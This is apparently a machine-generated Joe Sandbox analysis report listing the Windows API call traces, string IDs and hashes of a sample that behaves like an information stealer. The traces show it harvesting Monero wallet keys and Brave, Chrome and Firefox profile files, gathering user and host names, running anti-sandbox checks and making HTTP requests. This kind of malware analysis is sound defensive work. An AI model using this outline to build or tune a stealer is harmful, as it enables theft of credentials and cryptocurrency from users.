                                • Part of subcall function 00A67850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00A511B7), ref: 00A67880
                                • Part of subcall function 00A67850: RtlAllocateHeap.NTDLL(00000000), ref: 00A67887
                                • Part of subcall function 00A67850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00A6789F
                                • Part of subcall function 00A678E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A67910
                                • Part of subcall function 00A678E0: RtlAllocateHeap.NTDLL(00000000), ref: 00A67917
                                • Part of subcall function 00A678E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00A6792F
                                • Part of subcall function 00A6A9B0: lstrlen.KERNEL32(?,014488B8,?,\Monero\wallet.keys,00A70E17), ref: 00A6A9C5
                                • Part of subcall function 00A6A9B0: lstrcpy.KERNEL32(00000000), ref: 00A6AA04
                                • Part of subcall function 00A6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A6AA12
                                • Part of subcall function 00A6A8A0: lstrcpy.KERNEL32(?,00A70E17), ref: 00A6A905
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01448B38,?,00A7110C,?,00000000,?,00A71110,?,00000000,00A70AEF), ref: 00A66ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00A66AE8
                              • CloseHandle.KERNEL32(00000000), ref: 00A66AF9
                              • Sleep.KERNEL32(00001770), ref: 00A66B04
                              • CloseHandle.KERNEL32(?,00000000,?,01448B38,?,00A7110C,?,00000000,?,00A71110,?,00000000,00A70AEF), ref: 00A66B1A
                              • ExitProcess.KERNEL32 ref: 00A66B22
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                              • String ID:

                              Control-flow Graph

                              APIs
                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00A5123E
                              • __aulldiv.LIBCMT ref: 00A51258
                              • __aulldiv.LIBCMT ref: 00A51266
                              • ExitProcess.KERNEL32 ref: 00A51294
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                              • String ID: @

                              Control-flow Graph

                              APIs
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01448B38,?,00A7110C,?,00000000,?,00A71110,?,00000000,00A70AEF), ref: 00A66ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00A66AE8
                              • CloseHandle.KERNEL32(00000000), ref: 00A66AF9
                              • Sleep.KERNEL32(00001770), ref: 00A66B04
                              • CloseHandle.KERNEL32(?,00000000,?,01448B38,?,00A7110C,?,00000000,?,00A71110,?,00000000,00A70AEF), ref: 00A66B1A
                              • ExitProcess.KERNEL32 ref: 00A66B22
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                              • String ID:

                              Control-flow Graph

                              APIs
                              • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00A54839
                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 00A54849
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CrackInternetlstrlen
                              • String ID: <

                              Control-flow Graph

                              APIs
                                • Part of subcall function 00A6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A6A7E6
                                • Part of subcall function 00A56280: InternetOpenA.WININET(00A70DFE,00000001,00000000,00000000,00000000), ref: 00A562E1
                                • Part of subcall function 00A56280: StrCmpCA.SHLWAPI(?,0144F340), ref: 00A56303
                                • Part of subcall function 00A56280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00A56335
                                • Part of subcall function 00A56280: HttpOpenRequestA.WININET(00000000,GET,?,0144EB08,00000000,00000000,00400100,00000000), ref: 00A56385
                                • Part of subcall function 00A56280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00A563BF
                                • Part of subcall function 00A56280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A563D1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00A65228
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                              • String ID: ERROR$ERROR
                              • API String ID: 3287882509-2579291623
                              • Opcode ID: 7b20c2f9a1ab95e30f72a55dfc042fef0e513427440b143587ca532967477b9b
                              • Instruction ID: e89e2eeb5ccca1390d32e8ef5242347651ba90ae217df9d8fd4f05b7ce84c773
                              • Opcode Fuzzy Hash: 7b20c2f9a1ab95e30f72a55dfc042fef0e513427440b143587ca532967477b9b
                              • Instruction Fuzzy Hash: 5211F170910148A7CB14FF74DE52AED7378AF70340F408554F91A67592EF306B06CB91
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00A5112B
                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 00A51132
                              • ExitProcess.KERNEL32 ref: 00A51143
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$AllocCurrentExitNumaVirtual
                              • String ID:
                              • API String ID: 1103761159-0
                              • Opcode ID: dd2d40044074edf76df4002ad037eafb3cb4a44b30bbf21a833018c5d6ee613e
                              • Instruction ID: 8f2551f5896bd9c3d66bb05df6f36bbd8179117d1af8a0239e304db42fa911e4
                              • Opcode Fuzzy Hash: dd2d40044074edf76df4002ad037eafb3cb4a44b30bbf21a833018c5d6ee613e
                              • Instruction Fuzzy Hash: 4CE0E670A55308FBE7106BA09D0EB1D7678BB04B02F104155F709761D0D6B5264496D9
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00A510B3
                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00A510F7
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtual$AllocFree
                              • String ID:
                              • API String ID: 2087232378-0
                              • Opcode ID: d82073ab377a6cc270f30f6ecba7f8b4b27515fea08c7771e964b2c5e908509f
                              • Instruction ID: f7a5929dc0a872e410ed913609fb6cce1b95f5e64f4668c857d4fa58365a4967
                              • Opcode Fuzzy Hash: d82073ab377a6cc270f30f6ecba7f8b4b27515fea08c7771e964b2c5e908509f
                              • Instruction Fuzzy Hash: C5F0E271641208BBEB149BA4AC4AFBEB7ECE705B15F300448F904E3280D5719E04CAA5
                              APIs
                                • Part of subcall function 00A678E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A67910
                                • Part of subcall function 00A678E0: RtlAllocateHeap.NTDLL(00000000), ref: 00A67917
                                • Part of subcall function 00A678E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00A6792F
                                • Part of subcall function 00A67850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00A511B7), ref: 00A67880
                                • Part of subcall function 00A67850: RtlAllocateHeap.NTDLL(00000000), ref: 00A67887
                                • Part of subcall function 00A67850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00A6789F
                              • ExitProcess.KERNEL32 ref: 00A511C6
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Process$AllocateName$ComputerExitUser
                              • String ID:
                              • API String ID: 3550813701-0
                              • Opcode ID: 253781d2b97c7d75a0230c79f3eab346af91f3bc1902ba677f422acf8df958c1
                              • Instruction ID: afaeca3f0a1e658972edc964544675c4964723c1af25cb754ba6b6cfa3eb989a
                              • Opcode Fuzzy Hash: 253781d2b97c7d75a0230c79f3eab346af91f3bc1902ba677f422acf8df958c1
                              • Instruction Fuzzy Hash: F9E012B592470157DA0077F0AD0FB3E32AC6B1438EF040969FE05D3103FE29E95585A6
                              APIs
                              • wsprintfA.USER32 ref: 00A638CC
                              • FindFirstFileA.KERNEL32(?,?), ref: 00A638E3
                              • lstrcat.KERNEL32(?,?), ref: 00A63935
                              • StrCmpCA.SHLWAPI(?,00A70F70), ref: 00A63947
                              • StrCmpCA.SHLWAPI(?,00A70F74), ref: 00A6395D
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00A63C67
                              • FindClose.KERNEL32(000000FF), ref: 00A63C7C
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                              • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                              • API String ID: 1125553467-2524465048
                              • Opcode ID: 4b5876fb9adb8dd9cf8929738387bef37a56fbbb0a7891323557903cba5dfc80
                              • Instruction ID: d6819daa0f5f883c23b816fac028d6ca805998bfdffe2ef3f3d1ac82f9ca7c52
                              • Opcode Fuzzy Hash: 4b5876fb9adb8dd9cf8929738387bef37a56fbbb0a7891323557903cba5dfc80
                              • Instruction Fuzzy Hash: 9BA123B2A00218ABDF24DFA4DD89FEE7378BB58301F044589F60D96141EB759B85CF92
                              APIs
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                                • Part of subcall function 00A6A920: lstrcpy.KERNEL32(00000000,?), ref: 00A6A972
                                • Part of subcall function 00A6A920: lstrcat.KERNEL32(00000000), ref: 00A6A982
                                • Part of subcall function 00A6A9B0: lstrlen.KERNEL32(?,014488B8,?,\Monero\wallet.keys,00A70E17), ref: 00A6A9C5
                                • Part of subcall function 00A6A9B0: lstrcpy.KERNEL32(00000000), ref: 00A6AA04
                                • Part of subcall function 00A6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A6AA12
                                • Part of subcall function 00A6A8A0: lstrcpy.KERNEL32(?,00A70E17), ref: 00A6A905
                              • FindFirstFileA.KERNEL32(00000000,?,00A70B32,00A70B2B,00000000,?,?,?,00A713F4,00A70B2A), ref: 00A5BEF5
                              • StrCmpCA.SHLWAPI(?,00A713F8), ref: 00A5BF4D
                              • StrCmpCA.SHLWAPI(?,00A713FC), ref: 00A5BF63
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00A5C7BF
                              • FindClose.KERNEL32(000000FF), ref: 00A5C7D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                              • API String ID: 3334442632-726946144
                              • Opcode ID: 7580ba432eacf0a05a829202f1b459b4cf2d6e999c761565d56c0b4afe8b41fc
                              • Instruction ID: 61464e46445eb7d5e392befbfd5de4c406cf9d6e2a1f5c04b9f657fc903b4a48
                              • Opcode Fuzzy Hash: 7580ba432eacf0a05a829202f1b459b4cf2d6e999c761565d56c0b4afe8b41fc
                              • Instruction Fuzzy Hash: 6E42F572910104ABDB14FB70DE96EED737DAFA4300F408559B90AA7191EE349B49CFA2
                              APIs
                              • wsprintfA.USER32 ref: 00A6492C
                              • FindFirstFileA.KERNEL32(?,?), ref: 00A64943
                              • StrCmpCA.SHLWAPI(?,00A70FDC), ref: 00A64971
                              • StrCmpCA.SHLWAPI(?,00A70FE0), ref: 00A64987
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00A64B7D
                              • FindClose.KERNEL32(000000FF), ref: 00A64B92
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s$%s\%s$%s\*
                              • API String ID: 180737720-445461498
                              • Opcode ID: 43a5172cdb4ec55f946a518936ba70be42abd2f7459b653d66a02748df21c704
                              • Instruction ID: 8802d8de31c8e2950c18f5b3bdfbc9445d7186173fb262c1a008119f23874088
                              • Opcode Fuzzy Hash: 43a5172cdb4ec55f946a518936ba70be42abd2f7459b653d66a02748df21c704
                              • Instruction Fuzzy Hash: BE6132B2910218ABCB24EBA0DC49FEE737CBB58701F048589F50996181EB75AB85CFD1
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00A64580
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00A64587
                              • wsprintfA.USER32 ref: 00A645A6
                              • FindFirstFileA.KERNEL32(?,?), ref: 00A645BD
                              • StrCmpCA.SHLWAPI(?,00A70FC4), ref: 00A645EB
                              • StrCmpCA.SHLWAPI(?,00A70FC8), ref: 00A64601
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00A6468B
                              • FindClose.KERNEL32(000000FF), ref: 00A646A0
                              • lstrcat.KERNEL32(?,0144F1F0), ref: 00A646C5
                              • lstrcat.KERNEL32(?,0144DDE0), ref: 00A646D8
                              • lstrlen.KERNEL32(?), ref: 00A646E5
                              • lstrlen.KERNEL32(?), ref: 00A646F6
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                              • String ID: %s\%s$%s\*
                              • API String ID: 671575355-2848263008
                              • Opcode ID: 3c15db0ca7116b86887c50bac88a477f8e35d9643d63c9ab85a9820dbf3cd736
                              • Instruction ID: ae760ac5e73cd4b6274940404553c4ea76d104c222a5994aeac0f8f0bc6a02da
                              • Opcode Fuzzy Hash: 3c15db0ca7116b86887c50bac88a477f8e35d9643d63c9ab85a9820dbf3cd736
                              • Instruction Fuzzy Hash: 515146B6950218ABCB24EBB0DD8DFED737CBB58700F404589F60996190EB749B84CF92
                              APIs
                              • wsprintfA.USER32 ref: 00A63EC3
                              • FindFirstFileA.KERNEL32(?,?), ref: 00A63EDA
                              • StrCmpCA.SHLWAPI(?,00A70FAC), ref: 00A63F08
                              • StrCmpCA.SHLWAPI(?,00A70FB0), ref: 00A63F1E
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00A6406C
                              • FindClose.KERNEL32(000000FF), ref: 00A64081
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s
                              • API String ID: 180737720-4073750446
                              • Opcode ID: 4c7001b184ac3b1c373cdc92032f35f1c4014b376e47e9957461b56d6e583476
                              • Instruction ID: d911a8195c3b29f04bdf45b726aee62647fda602368d82149efe0a6276d6ef51
                              • Opcode Fuzzy Hash: 4c7001b184ac3b1c373cdc92032f35f1c4014b376e47e9957461b56d6e583476
                              • Instruction Fuzzy Hash: 66515AB2910218ABCF24EBB0DD49FEE737CBB58700F048589B65996080EB75DB85CF95
                              APIs
                              • wsprintfA.USER32 ref: 00A5ED3E
                              • FindFirstFileA.KERNEL32(?,?), ref: 00A5ED55
                              • StrCmpCA.SHLWAPI(?,00A71538), ref: 00A5EDAB
                              • StrCmpCA.SHLWAPI(?,00A7153C), ref: 00A5EDC1
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00A5F2AE
                              • FindClose.KERNEL32(000000FF), ref: 00A5F2C3
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\*.*
                              • API String ID: 180737720-1013718255
                              • Opcode ID: 44c62d7daff304da259e8c2256e9cd30534a962359df7695d6d7c89e0a354db9
                              • Instruction ID: 8a5afd078cb6ff3e1b00d7ab9a5a3c16e5be79ac76249d0f33511caa3ea31899
                              • Opcode Fuzzy Hash: 44c62d7daff304da259e8c2256e9cd30534a962359df7695d6d7c89e0a354db9
                              • Instruction Fuzzy Hash: 40E1B2729111189ADB58FB60DE56EEE737CAF64300F404599B51A73092EF306F8ACF92
                              APIs
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                                • Part of subcall function 00A6A920: lstrcpy.KERNEL32(00000000,?), ref: 00A6A972
                                • Part of subcall function 00A6A920: lstrcat.KERNEL32(00000000), ref: 00A6A982
                                • Part of subcall function 00A6A9B0: lstrlen.KERNEL32(?,014488B8,?,\Monero\wallet.keys,00A70E17), ref: 00A6A9C5
                                • Part of subcall function 00A6A9B0: lstrcpy.KERNEL32(00000000), ref: 00A6AA04
                                • Part of subcall function 00A6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A6AA12
                                • Part of subcall function 00A6A8A0: lstrcpy.KERNEL32(?,00A70E17), ref: 00A6A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00A715B8,00A70D96), ref: 00A5F71E
                              • StrCmpCA.SHLWAPI(?,00A715BC), ref: 00A5F76F
                              • StrCmpCA.SHLWAPI(?,00A715C0), ref: 00A5F785
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00A5FAB1
                              • FindClose.KERNEL32(000000FF), ref: 00A5FAC3
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: prefs.js
                              • API String ID: 3334442632-3783873740
                              • Opcode ID: 1ea9d8afcf2f320be4889839f5ba70ddea05e736ea47cb55522b72a6784a92f0
                              • Instruction ID: f02282d3645934face6b4d720a09149b822671f0780308f1e7b7c2df7ad33dba
                              • Opcode Fuzzy Hash: 1ea9d8afcf2f320be4889839f5ba70ddea05e736ea47cb55522b72a6784a92f0
                              • Instruction Fuzzy Hash: 90B123719001049FDB24FF64DD96BEE7379BF64300F5085A9A90AA7191EF306B49CF92
                              APIs
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00A7510C,?,?,?,00A751B4,?,?,00000000,?,00000000), ref: 00A51923
                              • StrCmpCA.SHLWAPI(?,00A7525C), ref: 00A51973
                              • StrCmpCA.SHLWAPI(?,00A75304), ref: 00A51989
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00A51D40
                              • DeleteFileA.KERNEL32(00000000), ref: 00A51DCA
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00A51E20
                              • FindClose.KERNEL32(000000FF), ref: 00A51E32
                                • Part of subcall function 00A6A920: lstrcpy.KERNEL32(00000000,?), ref: 00A6A972
                                • Part of subcall function 00A6A920: lstrcat.KERNEL32(00000000), ref: 00A6A982
                                • Part of subcall function 00A6A9B0: lstrlen.KERNEL32(?,014488B8,?,\Monero\wallet.keys,00A70E17), ref: 00A6A9C5
                                • Part of subcall function 00A6A9B0: lstrcpy.KERNEL32(00000000), ref: 00A6AA04
                                • Part of subcall function 00A6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A6AA12
                                • Part of subcall function 00A6A8A0: lstrcpy.KERNEL32(?,00A70E17), ref: 00A6A905
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 1415058207-1173974218
                              • Opcode ID: 324ce63912a758f0a092f56864a5c13cafa1178dfa85a032f28239152de12260
                              • Instruction ID: 4ab1d6e61b9a59ad777817fad118836d5899320f55cb3b87615bd5e0610b12d7
                              • Opcode Fuzzy Hash: 324ce63912a758f0a092f56864a5c13cafa1178dfa85a032f28239152de12260
                              • Instruction Fuzzy Hash: C812FE72910118ABDB19FB60CE96EEE7378AF64300F504599B51A73091EF706F89CFA1
                              APIs
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                                • Part of subcall function 00A6A9B0: lstrlen.KERNEL32(?,014488B8,?,\Monero\wallet.keys,00A70E17), ref: 00A6A9C5
                                • Part of subcall function 00A6A9B0: lstrcpy.KERNEL32(00000000), ref: 00A6AA04
                                • Part of subcall function 00A6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A6AA12
                                • Part of subcall function 00A6A8A0: lstrcpy.KERNEL32(?,00A70E17), ref: 00A6A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00A70C2E), ref: 00A5DE5E
                              • StrCmpCA.SHLWAPI(?,00A714C8), ref: 00A5DEAE
                              • StrCmpCA.SHLWAPI(?,00A714CC), ref: 00A5DEC4
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00A5E3E0
                              • FindClose.KERNEL32(000000FF), ref: 00A5E3F2
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                              • String ID: \*.*
                              • API String ID: 2325840235-1173974218
                              • Opcode ID: ac1408ed026c049fae9c7a43a3eb704cfb3302afc0b8638ea7096d5e3e2f0b30
                              • Instruction ID: e4d3a45891ef5a04aa9ff1ce1a82209b2ee0c913039e8917fa6ccc478f59ea9f
                              • Opcode Fuzzy Hash: ac1408ed026c049fae9c7a43a3eb704cfb3302afc0b8638ea7096d5e3e2f0b30
                              • Instruction Fuzzy Hash: 9FF1A0729101189ADB15FB60DE96EEE7378BF24300F9045DAB51A72091EF306F8ACF52
                              APIs
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                                • Part of subcall function 00A6A920: lstrcpy.KERNEL32(00000000,?), ref: 00A6A972
                                • Part of subcall function 00A6A920: lstrcat.KERNEL32(00000000), ref: 00A6A982
                                • Part of subcall function 00A6A9B0: lstrlen.KERNEL32(?,014488B8,?,\Monero\wallet.keys,00A70E17), ref: 00A6A9C5
                                • Part of subcall function 00A6A9B0: lstrcpy.KERNEL32(00000000), ref: 00A6AA04
                                • Part of subcall function 00A6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A6AA12
                                • Part of subcall function 00A6A8A0: lstrcpy.KERNEL32(?,00A70E17), ref: 00A6A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00A714B0,00A70C2A), ref: 00A5DAEB
                              • StrCmpCA.SHLWAPI(?,00A714B4), ref: 00A5DB33
                              • StrCmpCA.SHLWAPI(?,00A714B8), ref: 00A5DB49
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00A5DDCC
                              • FindClose.KERNEL32(000000FF), ref: 00A5DDDE
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: 4c79380611f2e08736f1b8a2e7a29e42b01e63ef1ee0183a247b913ca0f1f32f
                              • Instruction ID: b7c743fd8755aa6a7e3ec0155018d6345b6b2706e501c4bef0b666632c50c25c
                              • Opcode Fuzzy Hash: 4c79380611f2e08736f1b8a2e7a29e42b01e63ef1ee0183a247b913ca0f1f32f
                              • Instruction Fuzzy Hash: F0910472900104ABCB14FF70ED5AAED737DABA4301F408659F91AA6181EE349B5DCF92
                              APIs
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                              • GetKeyboardLayoutList.USER32(00000000,00000000,00A705AF), ref: 00A67BE1
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00A67BF9
                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 00A67C0D
                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00A67C62
                              • LocalFree.KERNEL32(00000000), ref: 00A67D22
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                              • String ID: /
                              • API String ID: 3090951853-4001269591
                              • Opcode ID: fa41f68b7ec8c469a08c5fe3feea1e9f57a3e9be60fcab31c0c9daed8f3543af
                              • Instruction ID: 3c49d05ffb2570004abd6d9caa4170ecf4fed88f6f73c70ff556c0a990d1b712
                              • Opcode Fuzzy Hash: fa41f68b7ec8c469a08c5fe3feea1e9f57a3e9be60fcab31c0c9daed8f3543af
                              • Instruction Fuzzy Hash: BA415C71950218ABCB24DF94DD99BEEB3B8FF54704F204599E109B2191DB342F85CFA1
                              APIs
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                                • Part of subcall function 00A6A920: lstrcpy.KERNEL32(00000000,?), ref: 00A6A972
                                • Part of subcall function 00A6A920: lstrcat.KERNEL32(00000000), ref: 00A6A982
                                • Part of subcall function 00A6A9B0: lstrlen.KERNEL32(?,014488B8,?,\Monero\wallet.keys,00A70E17), ref: 00A6A9C5
                                • Part of subcall function 00A6A9B0: lstrcpy.KERNEL32(00000000), ref: 00A6AA04
                                • Part of subcall function 00A6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A6AA12
                                • Part of subcall function 00A6A8A0: lstrcpy.KERNEL32(?,00A70E17), ref: 00A6A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00A70D73), ref: 00A5E4A2
                              • StrCmpCA.SHLWAPI(?,00A714F8), ref: 00A5E4F2
                              • StrCmpCA.SHLWAPI(?,00A714FC), ref: 00A5E508
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00A5EBDF
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 433455689-1173974218
